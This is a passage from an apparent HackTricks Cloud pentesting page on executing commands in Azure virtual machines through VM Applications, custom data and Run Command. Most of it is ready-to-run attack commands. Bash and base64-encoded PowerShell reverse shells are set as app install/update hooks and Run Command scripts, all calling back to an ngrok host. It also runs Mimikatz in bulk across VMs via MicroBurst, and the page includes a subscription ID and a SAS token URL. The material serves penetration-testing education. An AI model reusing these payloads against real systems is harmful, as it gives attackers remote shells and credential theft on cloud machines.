-ResourceGroupName $resourceGroup `
|
|
-VMName $vmName `
|
|
-ArchiveStorageAccountName $storageName `
|
|
-ArchiveBlobName 'revShell.ps1.zip' `
|
|
-AutoUpdate `
|
|
-ConfigurationName 'RevShellConfig'
|
|
```
|
|
|
|
</details>
|
|
|
|
<details>
|
|
|
|
<summary>Hybrid Runbook Worker</summary>
|
|
|
|
This is a VM extension that would allow to execute runbooks in VMs from an automation account. For more information check the [Automation Accounts service](../az-automation-account/).
|
|
|
|
</details>
|
|
|
|
### VM Applications
|
|
|
|
These are packages with all the **application data and install and uninstall scripts** that can be used to easily add and remove application in VMs.
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
# List all galleries in resource group
|
|
az sig list --resource-group <res-group> --output table
|
|
|
|
# List all apps in a fallery
|
|
az sig gallery-application list --gallery-name <gallery-name> --resource-group <res-group> --output table
|
|
```
|
|
{% endcode %}
|
|
|
|
These are the paths were the applications get downloaded inside the file system:
|
|
|
|
* Linux: `/var/lib/waagent/Microsoft.CPlat.Core.VMApplicationManagerLinux/<appname>/<app version>`
|
|
* Windows: `C:\Packages\Plugins\Microsoft.CPlat.Core.VMApplicationManagerWindows\1.0.9\Downloads\<appname>\<app version>`
|
|
|
|
Check how to install new applications in [https://learn.microsoft.com/en-us/azure/virtual-machines/vm-applications-how-to?tabs=cli](https://learn.microsoft.com/en-us/azure/virtual-machines/vm-applications-how-to?tabs=cli)
|
|
|
|
{% hint style="danger" %}
|
|
It's possible to **share individual apps and galleries with other subscriptions or tenants**. Which is very interesting because it could allow an attacker to backdoor an application and pivot to other subscriptions and tenants.
|
|
{% endhint %}
|
|
|
|
But there **isn't a "marketplace" for vm apps** like there is for extensions.
|
|
|
|
The permissions required are:
|
|
|
|
* `Microsoft.Compute/galleries/applications/write`
|
|
* `Microsoft.Compute/galleries/applications/versions/write`
|
|
* `Microsoft.Compute/virtualMachines/write`
|
|
* `Microsoft.Network/networkInterfaces/join/action`
|
|
* `Microsoft.Compute/disks/write`
|
|
|
|
Exploitation example to execute arbitrary commands:
|
|
|
|
{% tabs %}
|
|
{% tab title="Linux" %}
|
|
```bash
|
|
# Create gallery (if the isn't any)
|
|
az sig create --resource-group myResourceGroup \
|
|
--gallery-name myGallery --location "West US 2"
|
|
|
|
# Create application container
|
|
az sig gallery-application create \
|
|
--application-name myReverseShellApp \
|
|
--gallery-name myGallery \
|
|
--resource-group <rsc-group> \
|
|
--os-type Linux \
|
|
--location "West US 2"
|
|
|
|
# Create app version with the rev shell
|
|
## In Package file link just add any link to a blobl storage file
|
|
az sig gallery-application version create \
|
|
--version-name 1.0.2 \
|
|
--application-name myReverseShellApp \
|
|
--gallery-name myGallery \
|
|
--location "West US 2" \
|
|
--resource-group <rsc-group> \
|
|
--package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \
|
|
--install-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \
|
|
--remove-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \
|
|
--update-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'"
|
|
|
|
# Install the app in a VM to execute the rev shell
|
|
## Use the ID given in the previous output
|
|
az vm application set \
|
|
--resource-group <rsc-group> \
|
|
--name <vm-name> \
|
|
--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \
|
|
--treat-deployment-as-failure true
|
|
```
|
|
{% endtab %}
|
|
|
|
{% tab title="Windows" %}
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
# Create gallery (if the isn't any)
|
|
az sig create --resource-group <rsc-group> \
|
|
--gallery-name myGallery --location "West US 2"
|
|
|
|
# Create application container
|
|
az sig gallery-application create \
|
|
--application-name myReverseShellAppWin \
|
|
--gallery-name myGallery \
|
|
--resource-group <rsc-group> \
|
|
--os-type Windows \
|
|
--location "West US 2"
|
|
|
|
# Get encoded reverse shell
|
|
echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
|
|
|
|
# Create app version with the rev shell
|
|
## In Package file link just add any link to a blobl storage file
|
|
export encodedCommand="JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
|
|
az sig gallery-application version create \
|
|
--version-name 1.0.0 \
|
|
--application-name myReverseShellAppWin \
|
|
--gallery-name myGallery \
|
|
--location "West US 2" \
|
|
--resource-group <rsc-group> \
|
|
--package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \
|
|
--install-command "powershell.exe -EncodedCommand $encodedCommand" \
|
|
--remove-command "powershell.exe -EncodedCommand $encodedCommand" \
|
|
--update-command "powershell.exe -EncodedCommand $encodedCommand"
|
|
|
|
# Install the app in a VM to execute the rev shell
|
|
## Use the ID given in the previous output
|
|
az vm application set \
|
|
--resource-group <rsc-group> \
|
|
--name deleteme-win4 \
|
|
--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellAppWin/versions/1.0.0 \
|
|
--treat-deployment-as-failure true
|
|
```
|
|
{% endcode %}
|
|
{% endtab %}
|
|
{% endtabs %}
|
|
|
|
### User data
|
|
|
|
This is **persistent data** that can be retrieved from the metadata endpoint at any time. Note in Azure user data is different from AWS and GCP because **if you place a script here it's not executed by default**.
|
|
|
|
### Custom data
|
|
|
|
It's possible to pass some data to the VM that will be stored in expected paths:
|
|
|
|
* In **Windows** custom data is placed in `%SYSTEMDRIVE%\AzureData\CustomData.bin` as a binary file and it isn't processed.
|
|
* In **Linux** it was stored in `/var/lib/waagent/ovf-env.xml` and now it's stored in `/var/lib/waagent/CustomData/ovf-env.xml`
|
|
* **Linux agent**: It doesn't process custom data by default, a custom image with the data enabled is needed
|
|
* **cloud-init:** By default it processes custom data and this data may be in [**several formats**](https://cloudinit.readthedocs.io/en/latest/explanation/format.html). It could execute a script easily sending just the script in the custom data.
|
|
* I tried that both Ubuntu and Debian execute the script you put here.
|
|
* It's also not needed to enable user data for this to be executed.
|
|
|
|
```bash
|
|
#!/bin/sh
|
|
echo "Hello World" > /var/tmp/output.txt
|
|
```
|
|
|
|
### **Run Command**
|
|
|
|
This is the most basic mechanism Azure provides to **execute arbitrary commands in VMs**. The needed permission is `Microsoft.Compute/virtualMachines/runCommand/action`.
|
|
|
|
{% tabs %}
|
|
{% tab title="Linux" %}
|
|
```bash
|
|
# Execute rev shell
|
|
az vm run-command invoke \
|
|
--resource-group <rsc-group> \
|
|
--name <vm-name> \
|
|
--command-id RunShellScript \
|
|
--scripts @revshell.sh
|
|
|
|
# revshell.sh file content
|
|
echo "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" > revshell.sh
|
|
```
|
|
{% endtab %}
|
|
|
|
{% tab title="Windows" %}
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
# The permission allowing this is Microsoft.Compute/virtualMachines/runCommand/action
|
|
# Execute a rev shell
|
|
az vm run-command invoke \
|
|
--resource-group Research \
|
|
--name juastavm \
|
|
--command-id RunPowerShellScript \
|
|
--scripts @revshell.ps1
|
|
|
|
## Get encoded reverse shell
|
|
echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
|
|
|
|
## Create app version with the rev shell
|
|
## In Package file link just add any link to a blobl storage file
|
|
export encodedCommand="JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
|
|
|
|
# The content of
|
|
echo "powershell.exe -EncodedCommand $encodedCommand" > revshell.ps1
|
|
|
|
|
|
# Try to run in every machine
|
|
Import-module MicroBurst.psm1
|
|
Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
|
|
```
|
|
{% endcode %}
|
|
{% endtab %}
|
|
{% endtabs %}
|
|
|
|
## Privilege Escalation
|
|
|
|
{% content-ref url="../../az-privilege-escalation/az-virtual-machines-and-network-privesc.md" %}
|
|
[az-virtual-machines-and-network-privesc.md](../../az-privilege-escalation/az-virtual-machines-and-network-privesc.md)
|
|
{% endcontent-ref %}
|
|
|
|
## Unauthenticated Access
|
|
|
|
{% content-ref url="../../az-unauthenticated-enum-and-initial-entry/az-vms-unath.md" %}
|
|
[az-vms-unath.md](../../az-unauthenticated-enum-and-initial-entry/az-vms-unath.md)
|
|
{% endcontent-ref %}
|
|
|
|
## Post Exploitation
|
|
|
|
{% content-ref url="../../az-post-exploitation/az-vms-and-network-post-exploitation.md" %}
|
|
[az-vms-and-network-post-exploitation.md](../../az-post-exploitation/az-vms-and-network-post-exploitation.md)
|
|
{% endcontent-ref %}
|
|
|
|
## Persistence
|
|
|
|
{% content-ref url="../../az-persistence/az-vms-persistence.md" %}
|
|
[az-vms-persistence.md](../../az-persistence/az-vms-persistence.md)
|
|
{% endcontent-ref %}
|
|
|
|
## References
|
|
|
|
* [https://learn.microsoft.com/en-us/azure/virtual-machines/overview](https://learn.microsoft.com/en-us/azure/virtual-machines/overview)
|
|
* [https://hausec.com/2022/05/04/azure-virtual-machine-execution-techniques/](https://hausec.com/2022/05/04/azure-virtual-machine-execution-techniques/)
|
|
* [https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service](https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service)
|
|
|
|
{% hint style="success" %}
|
|
Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
|
|
Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|